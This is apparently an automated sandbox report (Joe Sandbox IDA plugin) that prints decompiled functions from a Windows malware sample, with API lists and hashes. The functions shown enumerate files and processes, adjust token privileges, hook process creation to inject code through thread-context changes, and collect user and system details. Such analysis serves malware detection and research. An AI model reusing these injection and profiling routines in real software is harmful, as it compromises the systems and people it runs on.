Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
String ID:
API String ID: 3751268071-0
Opcode ID: 49ebda7f4615f215f544573cbb4eb02f2fad3965ad114fad9527f42b4fcbad83
Instruction ID: 20a44b3edf0ad725c582de09b4e028c35b046ee16cdcaafcd69a0e87579aa600
Opcode Fuzzy Hash: 49ebda7f4615f215f544573cbb4eb02f2fad3965ad114fad9527f42b4fcbad83
Instruction Fuzzy Hash: 10417FB2510249AADB21DFA4DCC4DEE3BACBF18790F14442AFA15D7141E635D945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012BD44A Relevance: 10.6, APIs: 7, Instructions: 106
sleepfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E012BD44A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAW _v608;
				short _v1128;
				void* _t49;
				signed int _t58;
				long _t65;
				signed char _t67;
				signed int _t84;

				_v16 = __edx;
				_v12 = __ecx;
				_t49 = L012B1203( &_v1128, __ecx, "*");
				if(_t49 == 0) {
					L25:
					return _t49;
				}
				_t49 = FindFirstFileW( &_v1128,  &_v608);
				_v8 = _t49;
				if(_t49 == 0xffffffff) {
					goto L25;
				} else {
					_t67 = _a8;
					while(1) {
						_t84 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(L012B13A7( &(_v608.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v8,  &_v608) != 0) {
								continue;
							}
							break;
						}
						_t58 = _v608.dwFileAttributes & 0x00000010;
						if(_t58 == 0 || (_t67 & 0x00000002) == 0) {
							if(_t58 != _t84 || (_t67 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= _t84) {
								L17:
								if((_v608.dwFileAttributes & 0x00000010) != 0 && (_t67 & 0x00000001) != 0 && L012B1203( &_v1128, _v12,  &(_v608.cFileName)) != 0) {
									_t102 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									L012B1A23( &_v1128, _v16, _t102, _a4, _t67, _a12, _a16, _a20, _a24, _a28);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v608.cFileName),  *(_v16 + _t84 * 4)) == 0) {
								_t84 = _t84 + 1;
								if(_t84 < _a4) {
									continue;
								}
								goto L17;
							}
							_t65 = _a12(_a16);
							__eflags = _t65;
							if(_t65 == 0) {
								break;
							}
							__eflags = _a28;
							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					return FindClose(_v8);
				}
			}

0x012bd453
0x012bd463
0x012bd466
0x012bd46d
0x012bd5a1
0x012bd5a1
0x012bd5a1
0x012bd481
0x012bd487
0x012bd48d
0x00000000
0x012bd493
0x012bd494
0x012bd49f
0x012bd49f
0x012bd4a4
0x00000000
0x00000000
0x012bd4c8
0x012bd57c
0x012bd58e
0x00000000
0x00000000
0x00000000
0x012bd58e
0x012bd4d4
0x012bd4d7
0x012bd4e0
0x00000000
0x00000000
0x00000000
0x00000000
0x012bd4e7
0x012bd4e7
0x012bd4ea
0x012bd529
0x012bd530
0x012bd550
0x012bd554
0x012bd559
0x012bd559
0x012bd577
0x012bd577
0x00000000
0x012bd530
0x012bd4ec
0x012bd503
0x012bd507
0x00000000
0x00000000
0x00000000
0x012bd509
0x012bd517
0x012bd51a
0x012bd51c
0x00000000
0x00000000
0x012bd51e
0x012bd522
0x012bd527
0x012bd527
0x00000000
0x012bd522
0x012bd4d7
0x00000000
0x012bd59f

APIs

FindFirstFileW.KERNEL32(?,?,012D7428), ref: 012BD481
WaitForSingleObject.KERNEL32(?,00000000), ref: 012BD4AA
PathMatchSpecW.SHLWAPI(?,?), ref: 012BD4F9
Sleep.KERNEL32(00000000), ref: 012BD527
Sleep.KERNEL32(00000000,?), ref: 012BD559
FindNextFileW.KERNEL32(?,?), ref: 012BD586
FindClose.KERNEL32(?), ref: 012BD597

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Find$FileSleep$CloseFirstMatchNextObjectPathSingleSpecWait
String ID:
API String ID: 1935094245-0
Opcode ID: 5592c7c1fd21cad0576a62e02190341b5c7e555a5d2f9a5da750f122f957bbe2
Instruction ID: 7c9a99fba6d4bd5b705fcada813b035fbc69ef527d39d8e2a1e227f4ec0e4565
Opcode Fuzzy Hash: 5592c7c1fd21cad0576a62e02190341b5c7e555a5d2f9a5da750f122f957bbe2
Instruction Fuzzy Hash: 84417E7191021EAFDF21DF98EC88BED7B79EF4438CF104095EA44A21A1D7359A55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 012B4E98 Relevance: 10.6, APIs: 7, Instructions: 60
threadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E012B4E98(WCHAR* __ecx, signed char __edx) {
				signed char _v8;
				void* _v12;
				signed int _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t27;
				WCHAR* _t30;

				_t27 = 0;
				_v8 = __edx;
				_t30 = __ecx;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
					asm("sbb eax, eax");
					_v16 =  ~(_v8 & 0x000000ff) & 0x00000002;
					_v28.PrivilegeCount = 1;
					if(LookupPrivilegeValueW(_t27, _t30,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t27,  &_v28, _t27, _t27, _t27) != 0 && GetLastError() == 0) {
						_t27 = 1;
					}
					CloseHandle(_v12);
					return _t27;
				} else {
					return 0;
				}
			}

0x012b4ea4
0x012b4ea9
0x012b4eac
0x012b4ebd
0x012b4edb
0x012b4ee0
0x012b4ee9
0x012b4ef8
0x012b4f19
0x012b4f19
0x012b4f1e
0x00000000
0x012b4ed1
0x00000000
0x012b4ed1

APIs

GetCurrentThread.KERNEL32 ref: 012B4EAE
OpenThreadToken.ADVAPI32(00000000), ref: 012B4EB5
OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 012B4EC7
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 012B4EF0
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,?,?), ref: 012B4F05
GetLastError.KERNEL32(?,?), ref: 012B4F0F
CloseHandle.KERNEL32(?,?,?), ref: 012B4F1E

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
String ID:
API String ID: 2724707430-0
Opcode ID: 21ae846b4920c7d4b1c7bee11282a11251205b7c972415f3adf7474f03b73ed8
Instruction ID: 5a89ea454dbcae2abd2f4e3711b486de8873d2c3812a3bb89090648f9dc5f6ff
Opcode Fuzzy Hash: 21ae846b4920c7d4b1c7bee11282a11251205b7c972415f3adf7474f03b73ed8
Instruction Fuzzy Hash: 51115671A1514ABFEB209BB9ECCDAEF7B6CEF01785F010161F512E6045D63089448761

Uniqueness

Uniqueness Score: -1.00%

Function 012C2F67 Relevance: 9.1, APIs: 6, Instructions: 102
processCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E012C2F67() {
				char _v5;
				signed int _v12;
				int _v16;
				void* _v20;
				int _v24;
				char _v28;
				void** _v576;
				void* _v584;
				void* __edi;
				void* _t39;
				int _t43;
				signed int _t45;
				long _t51;
				signed int* _t52;
				void** _t53;
				void** _t54;
				void** _t56;
				void** _t60;
				void* _t68;
				void** _t69;

				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				while(1) {
					_t39 = CreateToolhelp32Snapshot(2, 0);
					_v20 = _t39;
					_v24 = 0;
					if(_t39 == 0xffffffff) {
						break;
					} else {
						_push( &_v584);
						_v584 = 0x22c;
						_t43 = Process32FirstW(_v20);
					}
					while(_t43 != 0) {
						_t60 = _v576;
						__eflags = _t60;
						if(_t60 <= 0) {
							L18:
							_t43 = Process32NextW(_v20,  &_v584);
							continue;
						}
						__eflags = _t60 -  *0x12dca00; // 0x0
						if(__eflags == 0) {
							goto L18;
						}
						_t45 = 0;
						__eflags = _v12;
						if(__eflags <= 0) {
							L8:
							_t68 = L012B1C44(_t60, _t66, _t68, __eflags);
							__eflags = _t68;
							if(_t68 == 0) {
								goto L18;
							}
							_t66 =  &_v28;
							_t69 = L012B114F(_v576,  &_v28);
							__eflags = _t69;
							if(_t69 == 0) {
								L17:
								CloseHandle(_t68);
								goto L18;
							} else {
								__eflags = _v28 -  *0x12dc748; // 0x0
								if(__eflags == 0) {
									_t51 = GetLengthSid( *_t69);
									__eflags = _t51 -  *0x12dc740;
									if(_t51 ==  *0x12dc740) {
										_t52 =  *0x12dc73c; // 0x0
										_t66 =  *_t52;
										_t53 = L012B1735( *_t69,  *_t52, _t51);
										__eflags = _t53;
										if(_t53 == 0) {
											_t66 = 4 + _v12 * 4;
											_t54 = L012B1C26( &_v16, 4 + _v12 * 4);
											__eflags = _t54;
											if(_t54 != 0) {
												_t66 = _v12;
												_v12 = _v12 + 1;
												_v24 = _v24 + 1;
												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v576;
												_t56 = E012C2ED8(_v16, _v576, _t68, 0);
												__eflags = _t56;
												if(_t56 != 0) {
													_v5 = 1;
												}
											}
										}
									}
								}
								L012B1933(_t69);
								goto L17;
							}
						} else {
							goto L6;
						}
						while(1) {
							L6:
							_t66 = _v16;
							__eflags =  *((intOrPtr*)(_t66 + _t45 * 4)) - _t60;
							if( *((intOrPtr*)(_t66 + _t45 * 4)) == _t60) {
								goto L18;
							}
							_t45 = _t45 + 1;
							__eflags = _t45 - _v12;
							if(__eflags < 0) {
								continue;
							}
							goto L8;
						}
						goto L18;
					}
					CloseHandle(_v20);
					if(_v24 != 0) {
						continue;
					}
					break;
				}
				L012B1933(_v16);
				return _v5;
			}

0x012c2f75
0x012c2f78
0x012c2f7b
0x012c2f7e
0x012c2f81
0x012c2f86
0x012c2f89
0x012c2f8f
0x00000000
0x012c2f95
0x012c2f9b
0x012c2f9f
0x012c2fa9
0x012c2fa9
0x012c3094
0x012c2fb3
0x012c2fb9
0x012c2fbb
0x012c3085
0x012c308f
0x00000000
0x012c308f
0x012c2fc1
0x012c2fc7
0x00000000
0x00000000
0x012c2fcd
0x012c2fcf
0x012c2fd2
0x012c2fe6
0x012c2feb
0x012c2fed
0x012c2fef
0x00000000
0x00000000
0x012c2ffb
0x012c3003
0x012c3005
0x012c3007
0x012c307e
0x012c307f
0x00000000
0x012c3009
0x012c300c
0x012c3012
0x012c3016
0x012c301c
0x012c3022
0x012c3027
0x012c302c
0x012c302e
0x012c3033
0x012c3035
0x012c303a
0x012c3044
0x012c3049
0x012c304b
0x012c304d
0x012c3059
0x012c305c
0x012c3061
0x012c306a
0x012c306f
0x012c3071
0x012c3073
0x012c3073
0x012c3071
0x012c304b
0x012c3035
0x012c3022
0x012c3079
0x00000000
0x012c3079
0x00000000
0x00000000
0x00000000
0x012c2fd4
0x012c2fd4
0x012c2fd4
0x012c2fd7
0x012c2fda
0x00000000
0x00000000
0x012c2fe0
0x012c2fe1
0x012c2fe4
0x00000000
0x00000000
0x00000000
0x012c2fe4
0x00000000
0x012c2fd4
0x012c309f
0x012c30a8
0x00000000
0x00000000
0x00000000
0x012c30a8
0x012c30b1
0x012c30bd

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 012C2F81
Process32FirstW.KERNEL32(?,?), ref: 012C2FA9
GetLengthSid.ADVAPI32(00000000,00000002,00000000), ref: 012C3016
CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 012C307F
Process32NextW.KERNEL32(?,0000022C), ref: 012C308F
CloseHandle.KERNEL32(?,00000002,00000000), ref: 012C309F

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CloseHandleProcess32$CreateFirstLengthNextSnapshotToolhelp32
String ID:
API String ID: 265895845-0
Opcode ID: e5e39aa0dd9db418a5026c10920a3bed1fc45d5c799047474f0d5d79d405ce06
Instruction ID: 0573122afcb385d0eabe479d8a9fdf3232d1aface6b3e0836affe48994f82e97
Opcode Fuzzy Hash: e5e39aa0dd9db418a5026c10920a3bed1fc45d5c799047474f0d5d79d405ce06
Instruction Fuzzy Hash: 7A41783191011BEFDF20EFA8E884ABDBB7AFF11744F2086ACD611A7254DB315A85CB11

Uniqueness

Uniqueness Score: -1.00%

Function 012C2C77 Relevance: 9.1, APIs: 6, Instructions: 83
threadnativeinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E012C2C77(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
				struct _CONTEXT _v720;
				void* __edi;
				intOrPtr _t30;
				long _t33;
				void** _t43;
				void* _t46;
				void* _t47;
				void** _t48;
				void* _t50;
				signed int _t52;
				void* _t62;

				_t46 = __edx;
				_t43 = _a8;
				_t48 = _a4;
				_t30 =  *0x12dc7b4(_t48, _t43, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
				_a40 = _t30;
				if(_t30 >= 0 && (_a32 & 0x00000001) != 0 && _t48 != 0 && _t43 != 0 && L012B150A() != 0) {
					_t33 = GetProcessId( *_t48);
					_t59 = _t33;
					if(_t33 != 0) {
						_t47 = L012B1C44(_t33, _t46, _t48, _t59);
						_a44 = _t47;
						_t60 = _t47;
						if(_t47 != 0) {
							_t50 = L012B1A05( *_t48, _t47, _t60, 0);
							_a32 = _t50;
							_t52 = _t50 -  *0x12dc74c + E012B1474;
							_v720.ContextFlags = 0x10003;
							if(GetThreadContext( *_t43,  &_v720) == 0) {
								L12:
								VirtualFreeEx( *_t48, _a32, 0, 0x8000);
							} else {
								_t62 = _v720.Eip -  *0x12dc7bc; // 0x770fba60
								if(_t62 != 0) {
									goto L12;
								} else {
									if(( *0x12dc738 & 0x00000010) != 0) {
										_t52 = _t52 ^ _v720.Eax;
									}
									_v720.Eax = _t52;
									_v720.ContextFlags = 0x10002;
									if(SetThreadContext( *_t43,  &_v720) == 0) {
										goto L12;
									}
								}
							}
							CloseHandle(_a44);
						}
					}
				}
				return _a40;
			}

0x012c2c77
0x012c2c85
0x012c2c8b
0x012c2ca5
0x012c2cab
0x012c2cb0
0x012c2cdf
0x012c2ce5
0x012c2ce7
0x012c2cf4
0x012c2cf6
0x012c2cf9
0x012c2cfb
0x012c2d0b
0x012c2d13
0x012c2d1f
0x012c2d25
0x012c2d37
0x012c2d79
0x012c2d85
0x012c2d39
0x012c2d3f
0x012c2d45
0x00000000
0x012c2d47
0x012c2d4e
0x012c2d50
0x012c2d50
0x012c2d5f
0x012c2d65
0x012c2d77
0x00000000
0x00000000
0x012c2d77
0x012c2d45
0x012c2d8e
0x012c2d94
0x012c2cfb
0x012c2ce7
0x012c2d9b

APIs

NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 012C2CA5
GetProcessId.KERNEL32(?), ref: 012C2CDF
GetThreadContext.KERNEL32(?,?,00000000), ref: 012C2D2F
SetThreadContext.KERNEL32(?,00010003), ref: 012C2D6F
VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000), ref: 012C2D85
CloseHandle.KERNEL32(?), ref: 012C2D8E

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: ContextProcessThread$CloseCreateFreeHandleUserVirtual
String ID:
API String ID: 276279584-0
Opcode ID: 4599f6b93c4f9e6f50843a2ce71bd4ee573485e35cfcb9379bd123361a2c39e4
Instruction ID: cebc629a33c5c244455ea1dd63e8464bdd38c84b3b74bf045e11157b872c353e
Opcode Fuzzy Hash: 4599f6b93c4f9e6f50843a2ce71bd4ee573485e35cfcb9379bd123361a2c39e4
Instruction Fuzzy Hash: 7A317A3151120AEBEF219F68E848BE93BBAEF58744F154168FF08A6158CB31D860CF50

Uniqueness

Uniqueness Score: -1.00%

Function 012B48A2 Relevance: 9.1, APIs: 6, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 012B48C1
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 012B48D9
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 012B48F5
CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 012B490D
CryptDestroyHash.ADVAPI32(?), ref: 012B4924
CryptReleaseContext.ADVAPI32(?,00000000), ref: 012B492E

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
String ID:
API String ID: 3186506766-0
Opcode ID: dd3ff2d3e3a5ddbb13ef073cedc3ef4992f81c678968dd67f55cde57c358b0f4
Instruction ID: b52f671e5a4ba60eb5fe9655d09d55b539a3d2e893092b5fca5426bbde2e627e
Opcode Fuzzy Hash: dd3ff2d3e3a5ddbb13ef073cedc3ef4992f81c678968dd67f55cde57c358b0f4
Instruction Fuzzy Hash: 7A1148B1C0514EBFEF129BD4EC89AEEBF7DFB08341F104450F642A5156C3328A549B21

Uniqueness

Uniqueness Score: -1.00%

Function 012C87ED Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E012C87ED(signed int* __ecx, signed char __edx) {
				signed int _v8;
				char _v9;
				signed int _v16;
				char _v24;
				char _v68;
				char _v552;
				char _v556;
				short _v588;
				void* __edi;
				signed int _t60;
				signed int _t62;
				signed int _t63;
				signed short _t70;
				signed int _t91;
				signed short _t93;
				signed int* _t122;
				void* _t126;

				_t122 = __ecx;
				_v16 = __edx;
				_t93 = 1;
				_v9 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					_t91 = L012B1A96();
					 *_t122 = _t91;
					if(_t91 == 0) {
						return 0;
					}
					_v9 = 1;
				}
				__eflags = _v16 & 0x00000001;
				if(__eflags == 0) {
					L9:
					__eflags = _v16 & 0x00000002;
					if((_v16 & 0x00000002) != 0) {
						_t15 =  &_v8;
						 *_t15 = _v8 & 0x00000000;
						__eflags =  *_t15;
						_t93 = L012B1564(_t122, 0x2713, 0x20000,  &_v8, 4);
					}
					L11:
					__eflags = _v16 & 0x00000004;
					if((_v16 & 0x00000004) == 0) {
						L16:
						__eflags = _t93;
						if(_t93 == 0) {
							L31:
							__eflags = _v9 - 1;
							if(_v9 == 1) {
								L012B1933( *_t122);
								 *_t122 =  *_t122 & 0x00000000;
								__eflags =  *_t122;
							}
							L33:
							return _t93;
						}
						__eflags = _v16 & 0x00000008;
						if((_v16 & 0x00000008) == 0) {
							L20:
							__eflags = _t93;
							if(_t93 == 0) {
								goto L31;
							}
							__eflags = _v16 & 0x00000010;
							if((_v16 & 0x00000010) == 0) {
								L28:
								__eflags = _t93;
								if(_t93 == 0) {
									goto L31;
								}
								__eflags = _v16 & 0x00000020;
								if((_v16 & 0x00000020) != 0) {
									E012C871F(_t122, _t122, 2);
									E012C871F(_t122, _t122, 0x17);
								}
								goto L33;
							}
							_t60 = GetModuleFileNameW(0,  &_v588, 0x103);
							_v8 = _t60;
							__eflags = _t60;
							if(_t60 != 0) {
								__eflags = 0;
								 *((short*)(_t126 + _t60 * 2 - 0x248)) = 0;
								_t93 = L012B1AA0(_t122, 0x271e, 0, 0x20000,  &_v588);
							}
							_v8 = 0x104;
							__eflags = _t93;
							if(_t93 == 0) {
								goto L31;
							} else {
								_push( &_v8);
								_t62 =  &_v588;
								_push(_t62);
								_push(2);
								L012D24C6();
								__eflags = _t62;
								if(_t62 != 0) {
									_t63 = _v8;
									__eflags = _t63;
									if(_t63 != 0) {
										__eflags = 0;
										 *((short*)(_t126 + _t63 * 2 - 0x248)) = 0;
										_t93 = L012B1AA0(_t122, 0x271f, 0, 0x20000,  &_v588);
									}
								}
								goto L28;
							}
						}
						L012B1A6E( &_v24);
						_t70 = L012B1564(_t122, 0x271c, 0x20000,  &_v24, 6);
						_t93 = _t70;
						__eflags = _t93;
						if(_t93 == 0) {
							goto L31;
						}
						__imp__GetUserDefaultUILanguage();
						_v8 = _t70 & 0x0000ffff;
						_t93 = L012B1564(_t122, 0x271d, 0x20000,  &_v8, 2);
						goto L20;
					}
					__eflags = _t93;
					if(_t93 == 0) {
						goto L31;
					}
					_v8 = L012B1C35();
					_t93 = L012B1564(_t122, 0x2719, 0x20000,  &_v8, 4);
					__eflags = _t93;
					if(_t93 == 0) {
						goto L31;
					}
					_v8 = L012B11C7();
					_t93 = L012B1564(_t122, 0x271b, 0x20000,  &_v8, 4);
					__eflags = _t93;
					if(_t93 == 0) {
						goto L31;
					}
					_v8 = GetTickCount();
					_t93 = L012B1564(_t122, 0x271a, 0x20000,  &_v8, 4);
					goto L16;
				}
				L012B11AE( &_v556);
				_t93 = L012B1AA0(_t122, 0x2711, __eflags, 0x20000,  &_v552);
				__eflags = _t93;
				if(_t93 == 0) {
					goto L11;
				}
				L012B12F3( &_v68);
				__eflags = _v68;
				if(__eflags != 0) {
					_t93 = L012B1AA0(_t122, 0x2712, __eflags, 0x20000,  &_v68);
				}
				__eflags = _t93;
				if(_t93 == 0) {
					goto L11;
				}
				goto L9;
			}

0x012c87f8
0x012c87fd
0x012c8800
0x012c8802
0x012c8806
0x012c8808
0x012c880d
0x012c8811
0x00000000
0x012c8813
0x012c881a
0x012c881a
0x012c881e
0x012c8828
0x012c8875
0x012c8875
0x012c8879
0x012c887b
0x012c887b
0x012c887b
0x012c8892
0x012c8892
0x012c8894
0x012c8894
0x012c8898
0x012c890a
0x012c890a
0x012c890c
0x012c8a0f
0x012c8a0f
0x012c8a13
0x012c8a17
0x012c8a1c
0x012c8a1c
0x012c8a1c
0x012c8a1f
0x00000000
0x012c8a21
0x012c8912
0x012c8916
0x012c895e
0x012c895e
0x012c8960
0x00000000
0x00000000
0x012c8966
0x012c896a
0x012c89f3
0x012c89f3
0x012c89f5
0x00000000
0x00000000
0x012c89f7
0x012c89fb
0x012c8a00
0x012c8a08
0x012c8a08
0x00000000
0x012c89fb
0x012c897e
0x012c8984
0x012c8987
0x012c8989
0x012c898b
0x012c898d
0x012c89a9
0x012c89a9
0x012c89ab
0x012c89b2
0x012c89b4
0x00000000
0x012c89b6
0x012c89b9
0x012c89ba
0x012c89c0
0x012c89c1
0x012c89c3
0x012c89c8
0x012c89ca
0x012c89cc
0x012c89cf
0x012c89d1
0x012c89d3
0x012c89d5
0x012c89f1
0x012c89f1
0x012c89d1
0x00000000
0x012c89ca
0x012c89b4
0x012c891b
0x012c892e
0x012c8933
0x012c8935
0x012c8937
0x00000000
0x00000000
0x012c893d
0x012c8946
0x012c895c
0x00000000
0x012c895c
0x012c889a
0x012c889c
0x00000000
0x00000000
0x012c88a7
0x012c88bd
0x012c88bf
0x012c88c1
0x00000000
0x00000000
0x012c88cc
0x012c88e2
0x012c88e4
0x012c88e6
0x00000000
0x00000000
0x012c88f2
0x012c8908
0x00000000
0x012c8908
0x012c8830
0x012c8849
0x012c884b
0x012c884d
0x00000000
0x00000000
0x012c8852
0x012c8857
0x012c885c
0x012c886f
0x012c886f
0x012c8871
0x012c8873
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 012C88EC
GetUserDefaultUILanguage.KERNEL32(00020000,?,00000006), ref: 012C893D
GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 012C897E
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 012C89C3

Strings

, xrefs: 012C89F7

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: NameUser$CountDefaultFileLanguageModuleTick
String ID:
API String ID: 2256650695-3916222277
Opcode ID: e9077ff661e79b5c14a2f3d4e7dab66663d1d56b58515bf0e7cf3e389e50da40
Instruction ID: 02755f1e2e801c410c7d822858ccab1d7c3742c87ad956cae362043138c282e8
Opcode Fuzzy Hash: e9077ff661e79b5c14a2f3d4e7dab66663d1d56b58515bf0e7cf3e389e50da40
